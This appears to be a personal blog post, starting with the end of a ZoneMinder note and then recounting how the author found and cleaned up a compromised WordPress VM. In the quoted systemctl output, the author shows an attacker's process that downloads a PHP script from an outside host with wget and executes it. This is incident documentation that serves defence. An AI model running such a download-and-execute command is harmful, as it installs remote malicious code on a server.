Keep an eye on CPU and RAM usage, as ZoneMinder relies on CPU to do processing and it can get hungry in terms of resource usage. Also pay attention to the usage of tmpfs /dev/shm if you have motion detection configured, as it can get filled up quickly. The size of tmpfs can be increased in VMs but not in LXC containers.

That's all I can think of right now. My configuration is very minimum. It works for me but may not suits everyone. I am still exploring ZoneMinder myself and may revisit this topic later on.

A Close Call: How a WordPress Site is Almost Hacked

Background

I have a few spare VMs running in the cloud, waiting to be purposed. These VMs are provisioned using Ansible but are not in production use. One of them hosts a WordPress site using basic LAMP stack. The only ports open to the world are SSH and HTTP/HTTPS. I should add that the sshd is configured to use key authentication only, as a sane person would do.

This particular VM runs Debian 11 and has 1 GB of RAM. It serves the sample page came with WordPress, with little to no configuration other than WP 2FA and W3 Total Cache plug-ins.

How I found out

I occasionally go to the website url to check if everything is working. Strangely enough, one day, the website was unreachable. I tried to ssh into the VM and the connection timed out. As a last resort, I went to the cloud provider's dashboard and rebooted the VM. As a side note, I uninstalled all diagnostics agent software pre-installed by the cloud provider just to keep the tiny VM lean; I could not monitor the VM in the dashboard as a result.

After the VM came back from reboot, the website started to show up and I could ssh in. Everything seemed to be functional again. However, it didn't last long until the VM locked up again. That is, a few hours later when I checked in, same things happened all over again.

Investigation

After a few more reboots, I decided to investigate the root cause of this strange behaviour. I highly doubted that the website was too popular: it's just a blank site with almost zero traffic. The apache configuration is kept as default; php-fpm configuration are tuned to be on the conservative side with very few workers. I started a bench test from another VM using apache2-utils package:

~$ ab -c30 -t30 'https://example.com/?cat=1'

This commands spins 30 dynamic connections from the other VM to stress test the php processing. As expected, it handles the test just fine, without any significant RAM usage.

As I dug deeper into the process tree, it didn't take me long to find out that the memory was slowing being eaten by php processes. It happened gradually over the course of a few hours, until all memory was consumed by php-fpm and OOM killer finally kicked in. A quick systemctl status -l php7.4-fpm.service gives the following info:

● php7.4-fpm.service - The PHP 7.4 FastCGI Process Manager
     Loaded: loaded (/lib/systemd/system/php7.4-fpm.service; enabled; vendor preset: enabled)
     Active: active (running) since Sun 2022-03-06 23:11:47 EST; 1h 13min ago
       Docs: man:php-fpm7.4(8)
    Process: 650 ExecStartPost=/usr/lib/php/php-fpm-socket-helper install /run/php/php-fpm.sock /etc/php/7.4/fpm/pool.d/www.conf 74 (code=exited, s>
   Main PID: 482 (php-fpm7.4)
     Status: "Processes active: 2, idle: 14, Requests: 166, slow: 0, Traffic: 0req/sec"
      Tasks: 75 (limit: 1128)
     Memory: 773.4M
        CPU: 14min 29.690s
     CGroup: /system.slice/php7.4-fpm.service
             ├─   482 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
             ├─   649 php-fpm: pool www
             ├─   750 php-fpm: pool www
             ├─   753 php-fpm: pool www
             ├─   768 php-fpm: pool www
             ├─ 56725 php-fpm: pool www
             ├─ 56736 php-fpm: pool www
             ├─ 56737 php-fpm: pool www
             ├─ 92508 php-fpm: pool www
             ├─ 92528 php-fpm: pool www
             ├─ 92529 php-fpm: pool www
             ├─ 92587 php-fpm: pool www
             ├─ 98783 sh -c wget http://32868.port0.org/st/get_xleet.txt -O inc.class.xleet.php; php inc.class.xleet.php
             ├─ 98848 php inc.class.xleet.php
             ├─107565 sh -c php inc.class.xleet.ph

The last three processes immediately gave me a chill in the back. Why is it downloading and executing a php script? It is so bad.

A quick ls -lA on the document root:

total 344
-rw-r--r--  1 www-data www-data  8197 Mar  7 15:21 .htaccess
-rwxr-xr-x  1 www-data www-data  2067 Feb 21 20:19 3index.php
-rw-r--r--  1 www-data www-data   362 Feb 16 11:25 accesson.php
-rw-r--r--  1 www-data www-data 16090 Mar  7 16:18 angry.txt
drwxr-xr-x  3 www-data www-data  4096 Feb 22 09:36 assets
-rw-r--r--  1 www-data www-data  1194 Mar  7 16:18 inc.class.xleet.php
-rwxr-xr-x  1 www-data www-data   405 Feb 22 19:35 index.php
-rwxr-xr-x  1 www-data www-data 19915 Mar  7 15:32 license.txt
-rw-r--r--  1 www-data www-data 12484 Mar  7 16:18 list.txt
-rwxr-xr-x  1 www-data www-data  2012 Nov 10 09:31 old-index.php
-rw-r--r--  1 www-data www-data    29 Feb 21 20:19 on.php
-rwxr-xr-x  1 www-data www-data  7437 Mar  7 15:32 readme.html
-rwxr-xr-x  1 www-data www-data   556 Oct 29 23:53 robots.txt
-rw-r--r--  1 www-data www-data 10445 Mar  7 16:18 roll.txt
-rwxr-xr-x  1 www-data www-data 16290 Oct 29 23:51 store.php
-rw-r--r--  1 www-data www-data  1219 Feb 22 19:35 unzip.php
-rwxr-xr-x  1 www-data www-data  2094 Nov 10 10:21 wikindex.php
drwxr-xr-x  8 www-data www-data  4096 Oct 29 16:10 wordpress
-rwxr-xr-x  1 www-data www-data  7165 Jan 20  2021 wp-activate.php
drwxr-xr-x  9 www-data www-data  4096 Dec 31  1969 wp-admin
-rwxr-xr-x  1 www-data www-data  7246 Nov 10 09:31 wp-admin.php
-rwxr-xr-x  1 www-data www-data   351 Feb  6  2020 wp-blog-header.php
-rwxr-xr-x  1 www-data www-data  2338 Feb  1 12:35 wp-comments-post.php
-rwxr-xr-x  1 www-data www-data  3001 Feb  1 12:35 wp-config-sample.php
-rwxr-xr-x  1 www-data www-data  3383 Sep 15 22:08 wp-config.php
drwxr-xr-x 10 www-data www-data  4096 Mar  7 15:33 wp-content
-rwxr-xr-x  1 www-data www-data  3939 Jul 30  2020 wp-cron.php
drwxr-xr-x 26 www-data www-data 12288 Feb  1 12:35 wp-includes
-rwxr-xr-x  1 www-data www-data  2496 Feb  6  2020 wp-links-opml.php
-rwxr-xr-x  1 www-data www-data  3900 May 15  2021 wp-load.php
-rwxr-xr-x  1 www-data www-data 47916 Feb  1 12:35 wp-login.php
-rwxr-xr-x  1 www-data www-data  8582 Feb  1 12:35 wp-mail.php
-rwxr-xr-x  1 www-data www-data 23025 Feb  1 12:35 wp-settings.php
-rwxr-xr-x  1 www-data www-data 31959 Feb  1 12:35 wp-signup.php
-rwxr-xr-x  1 www-data www-data  4747 Oct  8  2020 wp-trackback.php
-rwxr-xr-x  1 www-data www-data  3236 Jun  8  2020 xmlrpc.php

Clearly there are some unknown files being created (like angry.txt) and the BIG RED ALERT inc.class.xleet.php. I tried to delete those files and they kept popping up. I also noticed the weird permission in the document root, 755 seems to be too open. However, no time to think! I quickly removed the document root entirely and went on to check system logs to see if there is any bigger problem. Luckily I didn't find any evidence that the VM is compromised.

Back to WordPress, I downloaded a new installer and the default permission is conservative (644 for the most part). Extracted and started serving, the php scripts didn't make a come back.

Postmortem

I am not an expert in security but this is serious enough for me to reflect and make a lesson. The most likely scenario is that file permission for document root is too open. Either the www:data user or php-fpm process is compromised as a result.

It was ultimately due to a mis-configuration in my Ansible playbook, in which it extracts the WordPress tar ball and reset the permission to 755. Thank goodness this is the only affected machine, as other WordPress sites that I administer are setup by hand.

Lastly, I removed this VM entirely as a precaution.

Takeaways

There are three lessons I learned:

  1. When something strange happens, take it seriously and investigate; it's a sysadmin's responsibility
  2. Don't mess with default permission for no obvious reasons
  3. Examine the automation code carefully before pushing; convenience can sometimes be a double edge sword